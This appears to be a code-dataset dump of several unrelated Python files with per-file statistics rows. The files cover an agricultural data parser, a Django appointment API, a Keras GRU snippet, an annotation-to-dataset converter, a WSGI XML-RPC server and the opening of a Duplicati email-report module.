'statisticcat_desc', 'prodn_practice_desc', 'domaincat_desc', 'util_practice_desc'])
# modify contents of units column
df.loc[df['Unit'] == 'OPERATIONS', 'Unit'] = 'p'
# modify contents of flowamount column, "D" is supressed data, "z" means less than half the unit is shown
df['FlowAmount'] = df['FlowAmount'].str.strip() # trim whitespace
df.loc[df['FlowAmount'] == "(D)", 'FlowAmount'] = withdrawn_keyword
df.loc[df['FlowAmount'] == "(Z)", 'FlowAmount'] = withdrawn_keyword
df['FlowAmount'] = df['FlowAmount'].str.replace(",", "", regex=True)
# USDA CoA 2017 states that (H) means CV >= 99.95, therefore replacing with 99.95 so can convert column to int
# (L) is a CV of <= 0.05
df['Spread'] = df['Spread'].str.strip() # trim whitespace
df.loc[df['Spread'] == "(H)", 'Spread'] = 99.95
df.loc[df['Spread'] == "(L)", 'Spread'] = 0.05
df.loc[df['Spread'] == "", 'Spread'] = None # for instances where data is missing
df.loc[df['Spread'] == "(D)", 'Spread'] = withdrawn_keyword
# drop Descriptions that contain certain phrases, as these data are included in other categories
df = df[~df['Description'].str.contains('FRESH MARKET|PROCESSING|ENTIRE CROP|NONE OF CROP|PART OF CROP')]
# drop Descriptions that contain certain phrases - only occur in AG LAND data
df = df[~df['Description'].str.contains('INSURANCE|OWNED|RENTED|FAILED|FALLOW|IDLE|WOODLAND')]
# add location system based on year of data
if args['year'] >= '2019':
df['LocationSystem'] = 'FIPS_2019'
elif '2015' <= args['year'] < '2019':
df['LocationSystem'] = 'FIPS_2015'
elif '2013' <= args['year'] < '2015':
df['LocationSystem'] = 'FIPS_2013'
elif '2010' <= args['year'] < '2013':
df['LocationSystem'] = 'FIPS_2010'
# Add hardcoded data
df['Class'] = np.where(df["Unit"] == 'ACRES', "Land", "Other")
df['SourceName'] = "USDA_CoA_Cropland"
df['MeasureofSpread'] = "RSD"
df['DataReliability'] = None
df['DataCollection'] = 2
return df
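def _example_pipeline(build_url, config, args, make_http_call):
    """Hedged sketch, not part of the original module: roughly how the flowsa
    flowbyactivity pipeline drives these three functions. `make_http_call` is
    a hypothetical stand-in for the framework's HTTP helper."""
    urls = CoA_Cropland_URL_helper(build_url, config, args)
    frames = [coa_cropland_call(url, make_http_call(url), args) for url in urls]
    return coa_cropland_parse(frames, args)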
| 58.522013 | 153 | 0.629339 | 1,223 | 9,305 | 4.638594 | 0.29027 | 0.014807 | 0.027499 | 0.011458 | 0.242729 | 0.230742 | 0.142077 | 0.110347 | 0.110347 | 0.110347 | 0 | 0.012188 | 0.232886 | 9,305 | 158 | 154 | 58.892405 | 0.782572 | 0.284901 | 0 | 0.216981 | 0 | 0.018868 | 0.369268 | 0.051777 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028302 | false | 0 | 0.037736 | 0 | 0.09434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37ae25cb640514b4b69d9fbcf3fe21ab2db9d1d8 | 4,762 | py | Python | chiron/apps/visits/views.py | vahidzee/chiron | 66115f935a65253ec9c8a7feabfb7db0842acb29 | [
"MIT"
] | null | null | null | chiron/apps/visits/views.py | vahidzee/chiron | 66115f935a65253ec9c8a7feabfb7db0842acb29 | [
"MIT"
] | null | null | null | chiron/apps/visits/views.py | vahidzee/chiron | 66115f935a65253ec9c8a7feabfb7db0842acb29 | [
"MIT"
] | null | null | null | from django.db import IntegrityError
from rest_framework.authentication import TokenAuthentication, SessionAuthentication
from rest_framework.response import Response
import django.shortcuts as shortcuts
from rest_framework import (
status,
viewsets,
serializers as drf_serializers,
permissions as drf_permissions,
mixins,
decorators,
)
from . import serializers, models
from django.contrib.auth import get_user_model
from django.db.models import Q
class AppointmentViewSet(
viewsets.GenericViewSet,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.ListModelMixin,
mixins.DestroyModelMixin,
mixins.CreateModelMixin,
):
"""
APIs for retrieving and managing appointments
**Permissions**:
- _Authentication_ is required
**Actions & Endpoints**:
* **General Lists** [[/appointment/](/appointment/)]:
* [`GET`]: lists all appointments for the currently logged-in user
* [`POST`]: create an appointment for the currently logged-in user
* **Specific Appointment Managements** [`/appointment/<appointment_id>/`]:
* **Retrieve** [`GET`]: retrieve details of the specific appointment (if owned by user)
* **Update** & **Delete** [`PUT`, `DELETE`]: Update/Remove the specific appointment (if owned by the currently logged-in user as its patient)
* **Visit Specific Actions**:
* **Approve** [`/appointment/<appointment_id>/approve/` | `POST`]: approve the specific appointment (if owned by the currently logged-in user as its doctor)
* **Reject** [`/appointment/<appointment_id>/reject/` | `POST`]: reject the specific appointment (if owned by the currently logged-in user as its doctor)
* **Visit** [`/appointment/<appointment_id>/visit/` | `GET`]: retrieve contact info of the doctor if the appointment is approved (if the appointment is owned by the currently logged-in user as its patient)
"""
queryset = models.Appointment.objects.all()
permission_classes = [drf_permissions.IsAuthenticated]
authentication_classes = [SessionAuthentication, TokenAuthentication]
def get_serializer_class(self):
if self.action in ["retrieve", "list", "delete"]:
return serializers.AppointmentSerializer
if self.action in ["create", "update"]:
return serializers.AppointmentDoctorSerializer
return drf_serializers.Serializer
def filter_queryset(self, queryset):
if self.action in ["list", "retrieve", "delete"]:
return queryset.filter(
Q(doctor=self.request.user) | Q(patient=self.request.user)
)
return queryset
def perform_create(self, serializer):
serializer.is_valid()
serializer.save(
patient=self.request.user,
doctor=shortcuts.get_object_or_404(
get_user_model(), username=serializer.validated_data["doctor"]
),
)
def perform_update(self, serializer):
self.perform_create(serializer)
def apply_approval(self, request, toggle, pk=None):
appointment = self.get_object() # renamed from `object` to avoid shadowing the builtin
if appointment.doctor == request.user:
appointment.approved = toggle
appointment.save()
return Response(status=status.HTTP_202_ACCEPTED)
return Response(status=status.HTTP_400_BAD_REQUEST)
@decorators.action(methods=["POST"], detail=True, name="Reject Appointments")
def reject(self, request, pk=None):
"""
Reject appointment
**Permissions**:
* _Authentication_ is required
* API only available to _Owner_ of the appointment (the doctor)
"""
return self.apply_approval(request=request, toggle=False, pk=pk)
@decorators.action(methods=["POST"], detail=True, name="Approve Appointments")
def approve(self, request, pk=None):
"""
Approve appointment
**Permissions**:
* _Authentication_ is required
* API only available to _Owner_ of the appointment (the doctor)
"""
return self.apply_approval(request=request, toggle=True, pk=pk)
@decorators.action(methods=["GET"], detail=True, name="Visit")
def visit(self, request, pk=None):
"""
Get the contact information for appointment
**Permissions**:
* _Authentication_ is required
* API only available to _Owner_ of the appointment (the patient)
"""
appointment = self.get_object() # renamed from `object` to avoid shadowing the builtin
if appointment.patient == request.user and appointment.approved:
return Response(
data=dict(phone_number=str(appointment.doctor.phone)),
status=status.HTTP_202_ACCEPTED,
)
return Response(status=status.HTTP_400_BAD_REQUEST)
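# Hedged usage sketch (assumption, not part of this repo): a urls.py would
# typically expose the viewset through a DRF router so the endpoints documented
# in the class docstring resolve:
# from rest_framework import routers
# router = routers.DefaultRouter()
# router.register(r"appointment", AppointmentViewSet, basename="appointment")
# urlpatterns = router.urls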
| 37.203125 | 201 | 0.666107 | 512 | 4,762 | 6.082031 | 0.25 | 0.024727 | 0.034682 | 0.038536 | 0.331407 | 0.316956 | 0.272319 | 0.245986 | 0.245986 | 0.245986 | 0 | 0.004096 | 0.230995 | 4,762 | 127 | 202 | 37.496063 | 0.846259 | 0.337463 | 0 | 0.057143 | 0 | 0 | 0.036999 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.114286 | 0 | 0.442857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37aec59f9b17b9d32ce9730876f6d8d46a79c1b0 | 478 | py | Python | 3-natural-language-processing/2-nlp-character-pred.py | MLStruckmann/tensorflow-templates | ca35a8f055929ee4ec552fa03737d808a0fe3491 | [
"MIT"
] | null | null | null | 3-natural-language-processing/2-nlp-character-pred.py | MLStruckmann/tensorflow-templates | ca35a8f055929ee4ec552fa03737d808a0fe3491 | [
"MIT"
] | null | null | null | 3-natural-language-processing/2-nlp-character-pred.py | MLStruckmann/tensorflow-templates | ca35a8f055929ee4ec552fa03737d808a0fe3491 | [
"MIT"
] | null | null | null | # Simple character prediction model (stateful)
model = keras.models.Sequential([
keras.layers.GRU(128, return_sequences=True, stateful=True,
dropout=0.2, recurrent_dropout=0.2,
batch_input_shape=[batch_size, None, max_id]),
keras.layers.GRU(128, return_sequences=True, stateful=True,
dropout=0.2, recurrent_dropout=0.2),
keras.layers.TimeDistributed(keras.layers.Dense(max_id,
activation="softmax"))
]) | 43.454545 | 62 | 0.669456 | 59 | 478 | 5.271186 | 0.491525 | 0.141479 | 0.115756 | 0.109325 | 0.482315 | 0.482315 | 0.482315 | 0.482315 | 0.482315 | 0.482315 | 0 | 0.037037 | 0.209205 | 478 | 11 | 63 | 43.454545 | 0.785714 | 0.09205 | 0 | 0.222222 | 0 | 0 | 0.016548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b007b20e0af00196c2315cf92bfae9d58c871d | 12,681 | py | Python | data_format_scripts/makeDatasetTxt_4Points_fromCasper.py | TT-happy-work/keras-yolo3 | 92ed71769c1040a18cf18e88dab30bfaa16248f4 | [
"MIT"
] | null | null | null | data_format_scripts/makeDatasetTxt_4Points_fromCasper.py | TT-happy-work/keras-yolo3 | 92ed71769c1040a18cf18e88dab30bfaa16248f4 | [
"MIT"
] | null | null | null | data_format_scripts/makeDatasetTxt_4Points_fromCasper.py | TT-happy-work/keras-yolo3 | 92ed71769c1040a18cf18e88dab30bfaa16248f4 | [
"MIT"
] | null | null | null | import os
from xml.etree import ElementTree
from scipy.spatial import distance as dist
import numpy as np
from time import sleep
import cv2
from PIL import Image, ImageDraw
import colorsys
def order_points(ptsArr):
# pt_a, pt_b: out of the 2 left-most points, a is the top one and b is the bottom.
# pt_c, pt_d: out of the 2 right-most points, c is the bottom one and d is the top.
## sort the points based on their x-coordinates
xSorted = ptsArr[np.argsort(ptsArr[:, 0]), :]
## grab the 2 left-most and the 2 right-most points from the sorted
## x-coordinate points
leftMost = xSorted[:2, :]
rightMost = xSorted[2:, :]
## now, sort the left-most coordinates according to their
## y-coordinates so we can grab the top-left and bottom-left
## points, respectively
leftMost = leftMost[np.argsort(leftMost[:, 1]), :]
(pt_a, pt_b) = leftMost
## now that we have the top-left coordinate, use it as an
## anchor to calculate the Euclidean distance between the
## top-left and right-most points; by the Pythagorean
## theorem, the point with the largest distance will be
## our bottom-right point
# D = dist.cdist(tl[np.newaxis], rightMost, "euclidean")[0]
# (br, tr) = rightMost[np.argsort(D)[::-1], :]
# the remaining two points are arranged
# so that pt_c is the lower of the two
rightMost = rightMost[np.argsort(rightMost[:, 1])[::-1], :]
(pt_c, pt_d) = rightMost
## return the coordinates in top-left, bottom-left,
## bottom-right, top-right order (pt_a, pt_b, pt_c, pt_d)
return np.array([pt_a, pt_b, pt_c, pt_d], dtype="float32")
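# Hedged sanity check (assumption, not part of the original script): with the
# corners of a unit square, order_points() should come back as top-left,
# bottom-left, bottom-right, top-right (pt_a, pt_b, pt_c, pt_d).
def _check_order_points():
    square = np.array([[1, 0], [0, 0], [0, 1], [1, 1]], dtype=np.float32)
    expected = np.array([[0, 0], [0, 1], [1, 1], [1, 0]], dtype=np.float32)
    assert (order_points(square) == expected).all()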
if __name__ == '__main__':
## XML folder to convert to data text
mainDbFolder = '/home/tamar/DBs/Reccelite/All_data/Tagging3'
## class list file
labelsFile = '/home/tamar/DBs/Reccelite/All_data/class_names.txt' # extract labels dict from recce_names file
## Write contents of dictionary allImgs into recce_dataset.txt as required by k-means
fout = '/home/tamar/DBs/Reccelite/All_data/dataTxt_4points_Tagging3.txt'
## file to write annomalities into
annomalitiesFile = '/home/tamar/DBs/Reccelite/All_data/Annomalities_3.txt'
num_pts_per_tar = 4 # how many points per target to write to datatext
debug_prints = False
subFolderList = os.listdir(mainDbFolder)
allImgs = [] # list of Img-dictionaries. each dict is the complete info of an img.
annomal = [] # keep track of all sorts of problems (anomalies)
with open(labelsFile, 'r') as f:
labels = {}
for i, tar in enumerate(f):
labels[tar[:-1]] = i
for singleImg in subFolderList: # new Img
first_line_flag = True
singleImgAnnomalities = {}
annotationFile = os.path.join(mainDbFolder, singleImg, singleImg) + '.xml' # the name of the xml-file is similar to the name of the sub-folder
for file in os.listdir(os.path.join(mainDbFolder, singleImg)): # many of the xmls have shorter names
if file.endswith(".xml"):
os.rename(os.path.join(mainDbFolder, singleImg, file), annotationFile)
if os.path.isfile(os.path.join(mainDbFolder, singleImg, singleImg) + '.jpg'):
imgFilePath = os.path.join(mainDbFolder, singleImg, singleImg) + '.jpg'
elif os.path.isfile(os.path.join(mainDbFolder, singleImg, singleImg) + '.png'):
imgFilePath = os.path.join(mainDbFolder, singleImg, singleImg) + '.png'
else:
raise Exception('no image in dir') # instantiating the exception without raise would silently do nothing
if singleImg == 'XMLs' or not os.path.isfile(annotationFile):
singleImgAnnomalities['Img'] = imgFilePath
singleImgAnnomalities['Problem'] = 'No Annotations'
singleImgAnnomalities['tarID'] = 'ALL'
annomal.append(singleImgAnnomalities)
singleImgAnnomalities = {}
continue
singleImage_dict = {}
singleImage_dict['imagePath'] = imgFilePath
singleImage_dict['allTargetsInImg'] = []
allTargets = {}
f = open(annotationFile,'rt')
tree = ElementTree.parse(f)
root = tree.getroot()
for item in root.findall("./WorldPoints/WorldPoint"): # goes through each to collect all target-types with their ordinals
singleImgAnnomalities = {}
a = item.find('ID').text
b = item.find('Name').text
if debug_prints: print('type: ', a, b)
if not b: # invalid cls Type
singleImgAnnomalities['Img'] = imgFilePath
singleImgAnnomalities['tarID'] = a
singleImgAnnomalities['Problem'] = 'No Name Annotation'
annomal.append(singleImgAnnomalities)
singleImgAnnomalities = {}
continue
if b not in labels.keys(): # if this is a tarType not encountered before, add it to dict and to the labels_txt
if debug_prints: print('tarTYPE: ', b, 'Image:', imgFilePath)
labels[b] = max(labels.values())+1
with open(labelsFile, 'a+') as f:
f.write(b)
f.write('\n')
allTargets[item.find('ID').text] = item.find('Name').text # keys=IDs; values=tar-type
for item in root.findall("./Appearances/MarkedImage/SensorPointWorldPointPairs/SensorPointWorldPointPair"): # goes through each to collect all ordinal target types
pts = []
if item.find("./First/Shape").text == 'PointPolygon':
coo_count = 0
for coo in item.findall("./First/Coordinate"):
if not coo_count: # first coo of pointpolygon is not relevant.
coo_count = 1
if debug_prints: print('before pop', tar_id)
if item.findall("./Second/WorldPointId")[0].text == tar_id: # if belongs to the Polygon that was before - eliminate the polygon.
singleImage_dict['allTargetsInImg'].pop() # get rid of the polygon the was before this pointpolygon, if same ID
continue
[pts.append(x.text) for x in coo.findall("./X")]
[pts.append(y.text) for y in coo.findall("./Y")]
coo_count+=1
if debug_prints: print('\nPointPolygon: ', tar_id, pts)
elif item.find("./First/Shape").text != 'Polygon': # Protection from non-polygon entries + keep track of problem
# if item.find("./First/Shape").text != 'Polygon': # Protection from non-polygon entries + keep track of problem
singleImgAnnomalities['Img'] = imgFilePath
singleImgAnnomalities['tarID'] = item.findall("./Second/WorldPointId")[0].text
singleImgAnnomalities['Problem'] = item.find("./First/Shape").text
annomal.append(singleImgAnnomalities)
singleImgAnnomalities = {}
continue
else:
# try:
# if item.find("./First/partially_hidden").text:
# continue
# except:
# pass
tar_id = item.findall("./Second/WorldPointId")[0].text
for coo in item.findall("./First/Coordinate"):
[pts.append(x.text) for x in coo.findall("./X")]
[pts.append(y.text) for y in coo.findall("./Y")]
if debug_prints: print('\nPolygon: ', tar_id, pts)
ptsArr = np.reshape(np.asarray(pts, dtype=np.float32), (int(len(pts)/2), 2))
# tl = np.array((np.min(ptsArr[:, 0]), np.min(ptsArr[:, 1])))
# br = np.array((np.max(ptsArr[:, 0]), np.max(ptsArr[:, 1])))
if ptsArr.shape[0] != 4:
if debug_prints: print(annotationFile, item.findall("./Second/WorldPointId")[0].text)
pt_a, pt_b, pt_c, pt_d = order_points(ptsArr) # in order to obtain x_min etc correctly
tar = {}
if item.findall("./Second/WorldPointId")[0].text not in allTargets.keys():
continue
tar['tarID'] = int(item.findall("./Second/WorldPointId")[0].text) # holds the ordinal index of tar
tar['tarClass'] = allTargets[item.findall("./Second/WorldPointId")[0].text]
tar['tarX_a'] = pt_a[0]
tar['tarY_a'] = pt_a[1]
tar['tarX_b'] = pt_b[0]
tar['tarY_b'] = pt_b[1]
tar['tarX_c'] = pt_c[0]
tar['tarY_c'] = pt_c[1]
tar['tarX_d'] = pt_d[0]
tar['tarY_d'] = pt_d[1]
singleImage_dict['allTargetsInImg'].append(tar)
allImgs.append(singleImage_dict)
f = open(fout, "w")
for imgIdx in range(len(allImgs)):
if first_line_flag:
f.write(allImgs[imgIdx]['imagePath'] + ' ') # write to file the image name, after which will follow all info of all tars in img.
else:
f.write('\n' + allImgs[imgIdx]['imagePath'] + ' ') # write to file the image name, after which will follow all info of all tars in img.
first_line_flag = False
img = Image.open(allImgs[imgIdx]['imagePath'])
draw = ImageDraw.Draw(img)
## draw settings
hsv_tuples = [(x / len(labels), 0.9, 1.0) for x in range(len(labels))]
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
numOfTarsInImg = len(allImgs[imgIdx]['allTargetsInImg'])
imgShape = [cv2.imread(allImgs[imgIdx]['imagePath']).shape[0], cv2.imread(allImgs[imgIdx]['imagePath']).shape[1]]
showImg = []
for tar in range(numOfTarsInImg):
## DBG: To show only requested targets
#a = ['unknow', 'jeepprivate']
#if not any(x in allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass'] for x in a):
#continue
# showImg.append(1)
## Write to data txt file
if allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass'] == 'unknow':
continue
# f.write('#' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarID']) + '#')
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_a']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_a']) + ',') # write the a coordinates
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_b']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_b']) + ',') # write the b coordinates
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_c']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_c']) + ',') # write the c coordinates
f.write(str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_d']) + ',' + str(allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_d']) + ',') # write the d coordinates
f.write(str(labels[allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']]) + ' ')
## Show the boxes on image
# bbox = np.array((allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_a'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_a'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_b'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_b'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_c'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_c'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarX_d'], allImgs[imgIdx]['allTargetsInImg'][tar]['tarY_d']))
# tarText = allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']
## DBG: to search only for requested targets
#if not any(x in tarText for x in a):
#continue
# bbox_text = "%s" % tarText
# text_size = draw.textsize(bbox_text)
# bbox_reshaped = list(bbox.reshape(4, 2).reshape(-1))
# draw.rectangle(bbox_reshaped, outline=colors[labels[allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']]], width=3)
# text_origin = bbox_reshaped[:2] - np.array([0, text_size[1]])
# draw.rectangle([tuple(text_origin), tuple(text_origin + text_size)], fill=colors[labels[allImgs[imgIdx]['allTargetsInImg'][tar]['tarClass']]])
## draw bbox
# draw.text(tuple(text_origin), bbox_text, fill=(0, 0, 0))
## DBG: to show only images containing requested targets
# img.show()
# sleep(2)
# img.close()
f.close()
## Record the collected anomalies in a file
annoF = open(annomalitiesFile, "w")
for ann in annomal:
annoF.write('\n ----------------------- \nImage Path:' + ann['Img'] + '; \nThe Problem: ' + ann['Problem'] + '; \nthe Target ID: ' + ann['tarID'])
annoF.close() | 56.865471 | 439 | 0.59459 | 1,553 | 12,681 | 4.777849 | 0.213136 | 0.050809 | 0.090566 | 0.096092 | 0.392453 | 0.30566 | 0.179919 | 0.109973 | 0.100809 | 0.086792 | 0 | 0.008792 | 0.26449 | 12,681 | 223 | 440 | 56.865471 | 0.786748 | 0.314959 | 0 | 0.171053 | 0 | 0 | 0.149236 | 0.05608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006579 | false | 0 | 0.052632 | 0 | 0.065789 | 0.046053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b6eafa409acb5528b0f4f84a8bb707d55e196c | 3,839 | py | Python | pyspider/libs/wsgi_xmlrpc.py | zgwcome/pyspider | 1e6375850538d8e04793f5e26b6d92adf8db6a9e | [
"Apache-2.0"
] | 13,935 | 2015-01-01T04:48:55.000Z | 2022-03-30T02:02:42.000Z | pyspider/libs/wsgi_xmlrpc.py | zgwcome/pyspider | 1e6375850538d8e04793f5e26b6d92adf8db6a9e | [
"Apache-2.0"
] | 848 | 2015-01-04T14:13:40.000Z | 2022-03-04T02:29:44.000Z | pyspider/libs/wsgi_xmlrpc.py | zgwcome/pyspider | 1e6375850538d8e04793f5e26b6d92adf8db6a9e | [
"Apache-2.0"
] | 4,077 | 2015-01-02T03:01:27.000Z | 2022-03-27T12:06:40.000Z | # Copyright (c) 2006-2007 Open Source Applications Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Origin: https://code.google.com/p/wsgi-xmlrpc/
from six.moves.xmlrpc_server import SimpleXMLRPCDispatcher
import logging
logger = logging.getLogger(__name__)
class WSGIXMLRPCApplication(object):
"""Application to handle requests to the XMLRPC service"""
def __init__(self, instance=None, methods=None):
"""Create windmill xmlrpc dispatcher"""
if methods is None:
methods = []
try:
self.dispatcher = SimpleXMLRPCDispatcher(allow_none=True, encoding=None)
except TypeError:
# python 2.4
self.dispatcher = SimpleXMLRPCDispatcher()
if instance is not None:
self.dispatcher.register_instance(instance)
for method in methods:
self.dispatcher.register_function(method)
self.dispatcher.register_introspection_functions()
def register_instance(self, instance):
return self.dispatcher.register_instance(instance)
def register_function(self, function, name=None):
return self.dispatcher.register_function(function, name)
def handler(self, environ, start_response):
"""XMLRPC service for windmill browser core to communicate with"""
if environ['REQUEST_METHOD'] == 'POST':
return self.handle_POST(environ, start_response)
else:
start_response("400 Bad request", [('Content-Type', 'text/plain')])
return ['']
def handle_POST(self, environ, start_response):
"""Handles the HTTP POST request.
Attempts to interpret all HTTP POST requests as XML-RPC calls,
which are forwarded to the server's _dispatch method for handling.
Most code taken from SimpleXMLRPCServer with modifications for wsgi and my custom dispatcher.
"""
try:
# Get arguments by reading body of request.
# We read this in chunks to avoid straining
# socket.read(); around the 10 or 15Mb mark, some platforms
# begin to have problems (bug #792570).
length = int(environ['CONTENT_LENGTH'])
data = environ['wsgi.input'].read(length)
# In previous versions of SimpleXMLRPCServer, _dispatch
# could be overridden in this class, instead of in
# SimpleXMLRPCDispatcher. To maintain backwards compatibility,
# check to see if a subclass implements _dispatch and
# using that method if present.
response = self.dispatcher._marshaled_dispatch(
data, getattr(self.dispatcher, '_dispatch', None)
)
response += b'\n'
except Exception as e: # This should only happen if the module is buggy
# internal error, report as HTTP server error
logger.exception(e)
start_response("500 Server error", [('Content-Type', 'text/plain')])
return []
else:
# got a valid XML RPC response
start_response("200 OK", [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)),)])
return [response]
def __call__(self, environ, start_response):
return self.handler(environ, start_response)
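# Hedged usage sketch (assumption, not part of pyspider): the instance is a
# plain WSGI callable, so it can be served by any WSGI server, e.g. the
# stdlib reference server:
# from wsgiref.simple_server import make_server
# def ping():
#     return 'pong'
# app = WSGIXMLRPCApplication(methods=[ping])
# make_server('localhost', 8000, app).serve_forever()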
| 39.989583 | 109 | 0.655379 | 451 | 3,839 | 5.490022 | 0.470067 | 0.050889 | 0.044426 | 0.029079 | 0.051696 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01164 | 0.261526 | 3,839 | 95 | 110 | 40.410526 | 0.861728 | 0.419901 | 0 | 0.093023 | 0 | 0 | 0.078322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.046512 | 0.069767 | 0.372093 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b7d635ca3c11179e0de2c573fb71ee96d85d19 | 38,975 | py | Python | dremail.py | shofutex/duplicati-sqs-report | e9257dae228f774fb818389cfd192f8886282bae | [
"MIT"
] | null | null | null | dremail.py | shofutex/duplicati-sqs-report | e9257dae228f774fb818389cfd192f8886282bae | [
"MIT"
] | null | null | null | dremail.py | shofutex/duplicati-sqs-report | e9257dae228f774fb818389cfd192f8886282bae | [
"MIT"
] | null | null | null | #####
#
# Module name: dremail.py
# Purpose: Manage email connections for dupReport
#
# Notes:
#
#####
# Import system modules
import imaplib
import poplib
import email
import quopri
import base64
import re
import datetime
import time
import smtplib
import os
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import json
import ssl
# Import dupReport modules
import globs
import drdatetime
# Define message segments (line parts) for Duplicati result email messages
# lineParts[] are the individual line items in the Duplicati status email report.
#
# [0] internal name  [1] regex matched in the email body  [2] regex flags (0 = none)  [3] field type (0=int, 1=str)  [4] JSON field name
lineParts = [
('deletedFiles', 'DeletedFiles: \d+', 0, 0, 'DeletedFiles'),
('deletedFolders', 'DeletedFolders: \d+', 0, 0, 'DeletedFolders'),
('modifiedFiles', 'ModifiedFiles: \d+', 0, 0, 'ModifiedFiles'),
('examinedFiles', 'ExaminedFiles: \d+', 0, 0, 'ExaminedFiles'),
('openedFiles', 'OpenedFiles: \d+', 0, 0, 'OpenedFiles'),
('addedFiles', 'AddedFiles: \d+', 0, 0, 'AddedFiles'),
('sizeOfModifiedFiles', 'SizeOfModifiedFiles: .*', 0, 0, 'SizeOfModifiedFiles'),
('sizeOfAddedFiles', 'SizeOfAddedFiles: .*', 0, 0, 'SizeOfAddedFiles'),
('sizeOfExaminedFiles', 'SizeOfExaminedFiles: .*', 0, 0, 'SizeOfExaminedFiles'),
('sizeOfOpenedFiles', 'SizeOfOpenedFiles: .*', 0, 0, 'SizeOfOpenedFiles'),
('notProcessedFiles', 'NotProcessedFiles: \d+', 0, 0, 'NotProcessedFiles'),
('addedFolders', 'AddedFolders: \d+', 0, 0, 'AddedFolders'),
('tooLargeFiles', 'TooLargeFiles: \d+', 0, 0, 'TooLargeFiles'),
('filesWithError', 'FilesWithError: \d+', 0, 0, 'FilesWithError'),
('modifiedFolders', 'ModifiedFolders: \d+', 0, 0, 'ModifiedFolders'),
('modifiedSymlinks', 'ModifiedSymlinks: \d+', 0, 0, 'ModifiedSymlinks'),
('addedSymlinks', 'AddedSymlinks: \d+', 0, 0, 'AddedSymlinks'),
('deletedSymlinks', 'DeletedSymlinks: \d+', 0, 0, 'DeletedSymlinks'),
('partialBackup', 'PartialBackup: \w+', 0, 1, 'PartialBackup'),
('dryRun', 'Dryrun: \w+', 0, 1, 'Dryrun'),
('mainOperation', 'MainOperation: \w+', 0, 1, 'MainOperation'),
('parsedResult', 'ParsedResult: \w+', 0, 1, 'ParsedResult'),
('verboseOutput', 'VerboseOutput: \w+', 0, 1, ''), # No JSON equivalent
('verboseErrors', 'VerboseErrors: \w+', 0, 1, ''), # No JSON equivalent
('endTimeStr', 'EndTime: .*', 0, 1, 'EndTime'),
('beginTimeStr', 'BeginTime: .*', 0, 1, 'BeginTime'),
('dupversion', 'Version: .*', 0, 1, 'Version'),
('messages', 'Messages: \[.*^\]', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
